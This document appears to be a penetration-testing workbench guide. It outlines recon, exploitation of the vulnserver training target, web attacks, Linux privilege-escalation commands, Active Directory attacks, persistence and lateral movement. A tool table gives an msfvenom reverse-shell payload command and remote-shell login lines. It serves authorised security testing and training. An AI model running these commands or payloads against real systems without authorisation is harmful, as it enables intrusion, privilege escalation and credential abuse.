Pentest Workbench
Quick Start
- Define scope — target, rules of engagement, goals
- Recon — passive OSINT, network enumeration
- Identify — find vulnerabilities, misconfigs, weak points
- Exploit — leverage findings with appropriate technique
- Document — record steps, evidence, impact, remediation
Core Workflow
Phase 1: Recon & Enumeration
- Network OSINT: Use
nmap, masscan, rustscan for port discovery - Passive OSINT: Subdomain enum, WHOIS, Shodan, Censys, Google dorking
- Web recon: Dirbuster, ffuf, Burp Suite crawler
- For vulnerable targets: Netcat manual command probing first
Tools from linked repos:
netstalking-osint — automated OSINT recon workflowsPentest-Tools (40+ categories) — scanner/framework discovery, network_enum
Phase 2: Vulnerability Analysis
- Web: WPScan for WordPress, sqlmap for SQLi, Burp for auth bypass
- Network: nmap NSE scripts, Metasploit, searchsploit
- Binary: IDA/Ghidra for RE, checksec for mitigations
- Config reviews: weak permissions, default creds, exposed secrets
Phase 3: Exploitation
Buffer Overflow (vulnserver pattern):
- Send oversized input to identify crash point
- Control EIP with offset measurement
- Find stable jump (JMP ESP / call esp)
- Generate shellcode (msfvenom / custom)
- Execute with proper alignment
Web:
- SQLi → sqlmap or manual union/boolean
- XSS → Beef/XSS Hunter
- RCE → reverse shell via pentest-tools
Privesc (GTFOBins):
# Check sudo/suid binaries
sudo -l
find / -perm -4000 2>/dev/null
# Shell escape from restricted editor
:!/bin/bash
AD Attacks (Pentest-Tools):
- Kerberoasting, AS-REP roasting, SMB relay
- BloodHound/Sharphound enum → Golden/DFSRM
Phase 4: Post-Exploitation
- Cowrie honeypot: analyze attacker sessions for TTPs
- Privilege escalation: kernel exploits, sudo abuse, service misconfigs
- Persistence: scheduled tasks, services, SSH keys
- Lateral movement: PsExec, WMI, SMB, Pass-the-Hash
Phase 5: Documentation
- Steps reproducible by another tester
- Evidence: screenshots, packet captures, log output
- Impact: CVSS score, business risk
- Remediation: specific, actionable fixes
Key References
- Binary exploitation: See
references/buffer-overflow.md (vulnserver anatomy, exploit dev) - Privesc: See
references/privesc.md (GTFOBins/LOLBAS, Linux/Windows escalation) - Tool inventory: See
references/tools-inventory.md (all linked tools catalogued) - pwn.college: CTF exercises for memory corruption, ROP, kernel fundamentals
Exploit Dev (vulnserver)
Vulnserver runs on port 9999. Vulnerable commands:
| Command | Trigger Function | Buffer Size | Overflow Offset |
|---|
| --------- | ----------------- | ------------- | ----------------- |
| TRUN | Function3 | 2000 | ~2003 (EIP at ~2007) |
| GMON | Function3 | 2000 | Similar to TRUN |
| KSTET | Function2 | 60 | ~64 |
| GTER | Function1 | 140 | ~144 |
| LTER | Function3 | 2000 | Via transformation |
| HTER | Function4 | 1000 | Hex-encoded |
Key insight: essfunc.dll EssentialFunc10-14 also use strcpy into small buffers (140, 60, 2000, 2000, 1000).
Exploit strategy:
- Find offset with pattern_create / mona.py
- Confirm EIP control
- Locate or craft a ROP chain if ASLR/DEP present
- Generate alphanumeric shellcode if bad chars restrict ASCII
- Use egghunter if space is small
Tool Quick Ref
| Tool | Purpose | Key Command |
|---|
| ------ | --------- | ------------- |
| nmap | Port enum | nmap -sCV -p- -T4 target |
| Burp Suite | Web testing | Proxy, Repeater, Intruder |
| sqlmap | SQL injection | sqlmap -r req.txt --batch |
| msfvenom | Shellcode gen | msfvenom -p linux/x64/shell_tcp LHOST=x R |
| CrackMapExec | AD attacks | cme smb target -u user -p pass |
| Evil-WinRM | Remote shell | evil-winrm -i target -u user -p pass |
Mindset
- Methodical > flashy — good recon beats brute force
- Always document as you go — screenshot everything
- Understand the payload — not just "it works"
- Think like defender — what would stop this attack?